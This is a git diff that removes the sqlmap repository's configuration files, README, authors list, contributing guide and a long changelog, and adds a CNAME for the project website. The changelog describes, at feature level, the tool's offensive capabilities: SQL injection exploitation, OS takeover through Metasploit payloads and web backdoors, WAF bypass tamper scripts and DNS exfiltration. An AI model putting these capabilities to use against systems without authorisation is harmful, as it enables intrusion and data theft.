diff --git a/.gitattributes b/.gitattributes deleted file mode 100644 index a6b6a352..00000000 --- a/.gitattributes +++ /dev/null @@ -1,14 +0,0 @@ -*.py text eol=lf -*.conf text eol=lf - -*_ binary -*.dll binary -*.pdf binary -*.so binary -*.wav binary -*.zip binary -*.x32 binary -*.x64 binary -*.exe binary -*.sln binary -*.vcproj binary diff --git a/.gitignore b/.gitignore deleted file mode 100644 index ff18ea79..00000000 --- a/.gitignore +++ /dev/null @@ -1,5 +0,0 @@ -*.py[cod] -output/ -.sqlmap_history -traffic.txt -*~ \ No newline at end of file diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index 7bfe0cef..00000000 --- a/.travis.yml +++ /dev/null @@ -1,6 +0,0 @@ -language: python -python: - - "2.6" - - "2.7" -script: - - python -c "import sqlmap; import sqlmapapi" diff --git a/CNAME b/CNAME new file mode 100644 index 00000000..be9bef93 --- /dev/null +++ b/CNAME @@ -0,0 +1 @@ +sqlmap.org diff --git a/README.md b/README.md index 3329bbef..d7f70ae0 100644 --- a/README.md +++ b/README.md @@ -1,64 +1 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. 
It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. - -Screenshots ----- - -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki. - -Installation ----- - -You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository: - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform. - -Usage ----- - -To get a list of basic options and switches use: - - python sqlmap.py -h - -To get a list of all options and switches use: - - python sqlmap.py -hh - -You can find a sample run [here](https://gist.github.com/stamparm/5335217). -To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki). 
- -Links ----- - -* Homepage: http://sqlmap.org -* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* User's manual: https://github.com/sqlmapproject/sqlmap/wiki -* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots - -Translations ----- - -* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) -* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) -* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) -* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) -* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) -* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) -* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) +sqlmap.org website diff --git a/doc/AUTHORS b/doc/AUTHORS deleted file mode 100644 index d3758d67..00000000 --- a/doc/AUTHORS +++ /dev/null @@ -1,7 +0,0 @@ -Bernardo Damele Assumpcao Guimaraes (@inquisb) - - -Miroslav Stampar (@stamparm) - - -You can contact both developers by writing to dev@sqlmap.org diff 
--git a/doc/CHANGELOG.md b/doc/CHANGELOG.md deleted file mode 100644 index deae85e4..00000000 --- a/doc/CHANGELOG.md +++ /dev/null @@ -1,368 +0,0 @@ -# Version 1.0 (2016-02-27) - -* Implemented support for automatic decoding of page content through detected charset. -* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). -* Major improvements to program stabilization based on user reports. -* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. -* Fixed major bug with DNS leaking in Tor mode. -* Added wordlist compilation made of the most popular cracking dictionaries. -* Implemented multi-processor hash cracking routine(s). -* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method. -* Old resume files are now deprecated and replaced by faster SQLite based session mechanism. -* Substantial code optimization and smaller memory footprint. -* Added option `-m` for scanning multiple targets enlisted in a given textual file. -* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form. -* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests. -* Added option `--host` for manually setting HTTP Host header value. -* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself. -* Added option `--skip` for skipping tests for given parameter(s). -* Added switch `--titles` for comparing pages based only on their titles. -* Added option `--charset` for forcing character encoding used for data retrieval. -* Added switch `--check-tor` for checking if Tor is used properly. -* Added option `--crawl` for multithreaded crawling of a given website starting from the target url. -* Added option `--csv-del` for manually setting delimiting character used in CSV output. 
-* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. -* Added switch `--smart` for conducting through tests only in case of positive heuristic(s). -* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. -* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. -* Added switch `--count` to count the number of entries for a specific table or all database(s) tables. -* Major improvements to switches `--tables` and `--columns`. -* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof. -* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header. -* Added switch `-a` to enumerate all DBMS data. -* Added option `--alert` to run host OS command(s) when SQL injection is found. -* Added option `--answers` to set user answers to asked questions during sqlmap run. -* Added option `--auth-file` to set HTTP authentication PEM cert/private key file. -* Added option `--charset` to force character encoding used during data retrieval. -* Added switch `--check-tor` to force checking of proper usage of Tor. -* Added option `--code` to set HTTP code to match when query is evaluated to True. -* Added option `--cookie-del` to set character to be used while splitting cookie values. -* Added option `--crawl` to set the crawling depth for the website starting from the target URL. -* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`). -* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token. -* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token. -* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`). -* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password). 
-* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies. -* Added switch `--disable-coloring` to disable console output coloring. -* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s). -* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`). -* Added option `--eval` for setting the Python code that will be evaluated before the request. -* Added switch `--force-ssl` to force usage of SSL/HTTPS. -* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval. -* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`). -* Added switch `-hh` for showing advanced help message. -* Added option `--host` to set the HTTP Host header value. -* Added switch `--hostname` to turn on retrieval of DBMS server hostname. -* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. -* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection. -* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). -* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. -* Added switch `--invalid-logical` for usage of logical operations while invalidating values. -* Added switch `--invalid-string` for usage of random strings while invalidating values. -* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format. -* Added option `-m` to set the textual file holding multiple targets for scanning purposes. -* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`). -* Added switch `--no-cast` for turning off payload casting mechanism. -* Added switch `--no-escape` for turning off string escaping mechanism. -* Added option `--not-string` for setting string to be matched when query is evaluated to False. -* Added switch `--offline` to force work in offline mode (i.e. 
only use session data). -* Added option `--output-dir` to set custom output directory path. -* Added option `--param-del` to set character used for splitting parameter values. -* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing). -* Added option `--proxy-file` to set file holding proxy list. -* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory. -* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run. -* Added option `--safe-post` to set POST data for sending to safe URL. -* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL. -* Added option `--skip` to skip testing of given parameter(s). -* Added switch `--skip-static` to skip testing parameters that not appear dynamic. -* Added switch `--skip-urlencode` to skip URL encoding of payload data. -* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection. -* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). -* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). -* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. -* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`). -* Added option `--test-skip` for skiping tests by payloads and/or titles (e.g. `BENCHMARK`). -* Added switch `--titles` to turn on comparison of pages based only on their titles. -* Added option `--tor-port` to explicitly set Tor proxy port. -* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`). -* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection. -* Added option `--where` to set `WHERE` condition to be used during the table dumping. 
-* Added option `-X` to exclude DBMS database table column(s) from enumeration. -* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing. -* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`). - -# Version 0.9 (2011-04-10) - -* Rewritten SQL injection detection engine. -* Support to directly connect to the database without passing via a SQL injection, option `-d`. -* Added full support for both time-based blind SQL injection and error-based SQL injection techniques. -* Implemented support for SQLite 2 and 3. -* Implemented support for Firebird. -* Implemented support for Microsoft Access, Sybase and SAP MaxDB. -* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`. -* Added support to tamper injection data with option `--tamper`. -* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack. -* Added support to enumerate roles on Oracle, `--roles` switch. -* Added support for SOAP based web services requests. -* Added support to fetch unicode data. -* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`. -* Implemented several optimization switches to speed up the exploitation of SQL injections. -* Support to test and inject against HTTP Referer header. -* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`. -* Implemented feature to speedup the enumeration of table names. -* Support for customizable HTTP(s) redirections. -* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`. -* Support to parse and test forms on target url, switch `--forms`. -* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL. 
-* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection. -* Added safe URL feature, `--safe-url` and `--safe-freq`. -* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content. -* Implemented few other features and switches. -* Over 100 bugs fixed. -* Major code refactoring. -* User's manual updated. - -# Version 0.8 (2010-03-14) - -* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials. -* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table. -* Support for takeover features on PostgreSQL 8.4. -* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows. -* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root. -* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries. -* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function. -* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5. -* Updated active fingerprint for PostgreSQL 8.4. -* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`. 
-* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses. -* Support for Certificate authentication, `--auth-cert` option added. -* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`. -* Added option `-r` to load a single HTTP request from a text file. -* Added switch `--ignore-proxy` to ignore the system default HTTP proxy. -* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`. -* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`. -* Major bug fix and enhancements to the multi-threading (`--threads`) functionality. -* Fixed URL encoding/decoding of GET/POST parameters and Cookie header. -* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository. -* Major bugs fixed. -* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack. -* Major code cleanup. -* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware. -* Updated user's manual. -* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html. - -# Version 0.8 release candidate (2009-09-21) - -* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection. -* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. 
-* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. -* Added options for MySQL and PostgreSQL to inject custom user-defined functions. -* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output. -* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified. -* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. -* Minor bugs fixed. -* Major code refactoring. - -# Version 0.7 (2009-07-25) - -* Adapted Metasploit wrapping functions to work with latest 3.3 development version too. -* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too. -* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. -* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=). -* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+. -* Major bug fix to sql-query/sql-shell features. -* Major bug fix in `--read-file` option. -* Major silent bug fix to multi-threading functionality. -* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided. -* Fixed MySQL 'comment injection' version fingerprint. -* Fixed basic Microsoft SQL Server 2000 fingerprint. -* Many minor bug fixes and code refactoring. 
- -# Version 0.7 release candidate (2009-04-22) - -* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server; -* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux; -* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support; -* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit; -* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server; -* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable; -* Speed up the inference algorithm by providing the minimum required charset for the query output; -* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little; -* Many minor bug fixes, minor enhancements and layout adjustments. 
- -# Version 0.6.4 (2009-02-03) - -* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object; -* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology; -* Major speed increase in DBMS basic fingerprint; -* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator; -* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; -* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment; -* Minor layout adjustment to the `--update` output; -* Increased default timeout to 30 seconds; -* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle; -* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable; -* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server; -* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided; -* Updated documentation. 
- -# Version 0.6.3 (2008-12-18) - -* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ; -* Major enhancement to support Partial UNION query SQL injection technique too; -* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality; -* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`; -* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers; -* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; -* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher; -* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`; -* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user; -* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle; -* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content; -* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. 
By default Accept, Accept-Language and Accept-Charset headers are set; -* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords; -* Minor improvements to sqlmap Debian package files; -* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; -* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url; -* Major bug fix to correctly enumerate columns on Microsoft SQL Server; -* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified; -* Minor bug fix to correctly dump table entries when the column is provided; -* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests; -* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread; -* Increased default output level from 0 to 1; -* Updated documentation. 
- -# Version 0.6.2 (2008-11-02) - -* Major bug fix to correctly dump tables entries when `--stop` is not specified; -* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; -* Major bug fix when the request is POST to also send the GET parameters if any have been provided; -* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`; -* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; -* Minor bug fix in MySQL comment injection fingerprint technique; -* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database; -* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided; -* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3; -* More user-friendly warning messages. - -# Version 0.6.1 (2008-08-20) - -* Major bug fix to blind SQL injection bisection algorithm to handle an exception; -* Added a Metasploit Framework 3 auxiliary module to run sqlmap; -* Implemented possibility to test for and inject also on LIKE statements; -* Implemented `--start` and `--stop` options to set the first and the last table entry to dump; -* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool; -* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; -* Changed the order sqlmap dump table entries from column by column to row by row. 
Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore; -* Minor bug fix to correctly handle parameters' value with `%` character. - -# Version 0.6 (2008-09-01) - -* Complete code refactor and many bugs fixed; -* Added multithreading support to set the maximum number of concurrent HTTP requests; -* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; -* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; -* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file; -* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option; -* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) 
installation binary packages; -* Created sqlmap .exe (Windows) portable executable; -* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times; -* Improved automatic check for parenthesis when testing and forging SQL query vector; -* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable; -* Implemented support for HTTPS requests over HTTP(S) proxy; -* Added a check to handle NULL or not available queries output; -* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks; -* Improved XML files structure; -* Implemented the possibility to change the HTTP Referer header; -* Added support to resume from session file also when running with inband SQL injection attack; -* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; -* Added a check to assure that the provided string to match (`--string`) is within the page content; -* Fixed various queries in XML file; -* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it; -* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function; -* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable; -* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic; -* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires; -* Added support to inject also on Set-Cookie parameters; -* Implemented TAB 
completion and command history on both `--sql-shell` and `--os-shell`; -* Renamed some command line options; -* Added a conversion library; -* Added code schema and reminders for future developments; -* Added Copyright comment and $Id$; -* Updated the command line layout and help messages; -* Updated some docstrings; -* Updated documentation files. - -# Version 0.5 (2007-11-04) - -* Added support for Oracle database management system -* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins; -* Added support to extract database users password hash on Microsoft SQL Server; -* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting; -* Added support for SQL injection on HTTP Cookie and User-Agent headers; -* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. 
Splitted getValue() into getInband() and getBlind(); -* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack; -* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables; -* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`); -* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default; -* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml; -* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped; -* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py; -* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`); -* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces; -* More minor layout enhancements in some libraries; -* Renamed DMBS plugins; -* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; -* Updated all documentation files. 
- -# Version 0.4 (2007-06-15) - -* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS; -* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS; -* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); -* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); -* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; -* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; -* Improved logging functionality: passed from banal 'print' to Python native logging library; -* Added support for more than one parameter in `-p` command line option; -* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`); -* Added the command line option `--remote-dbms` to manually specify the remote DBMS; -* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements; -* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`); -* Added support to specify the database table column to enumerate (`-C COL`); -* Added inband SQL injection (UNION query) support (`--union-use`); -* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; -* Reviewed the directory tree structure; -* Splitted lib/common.py: inband injection functionalities 
now are moved to lib/union.py; -* Updated documentation files. - -# Version 0.3 (2007-01-20) - -* Added module for MS SQL Server; -* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check; -* Added PostgreSQL dbms active fingerprint; -* Added support for string match (`--string`); -* Added support for UNION check (`--union-check`); -* Removed duplicated code, delegated most of features to the engine in common.py and option.py; -* Added support for `--data` command line argument to pass the string for POST requests; -* Added encodeParams() method to encode url parameters before making http request; -* Many bug fixes; -* Rewritten documentation files; -* Complete code restyling. - -# Version 0.2 (2006-12-13) - -* complete refactor of entire program; -* added TODO and THANKS files; -* added some papers references in README file; -* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header; -* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions; -* replaced old inference algorithm with a new bisection algorithm. 
-* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter; -* improved Common class, adding support for http proxy and http post method in hash_page; -* added OptionCheck class in option.py which performs all needed checks on command line parameters and values; -* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters; -* improved output methods in dump.py; -* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions. diff --git a/doc/CONTRIBUTING.md b/doc/CONTRIBUTING.md deleted file mode 100644 index 1de4a195..00000000 --- a/doc/CONTRIBUTING.md +++ /dev/null @@ -1,38 +0,0 @@ -# Contributing to sqlmap - -## Reporting bugs - -**Bug reports are welcome**! -Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). - -### Guidelines - -* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. -* Make sure you can reproduce the bug with the latest development version of sqlmap. -* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. -* If you are making an enhancement request, lay out the rationale for the feature you are requesting. 
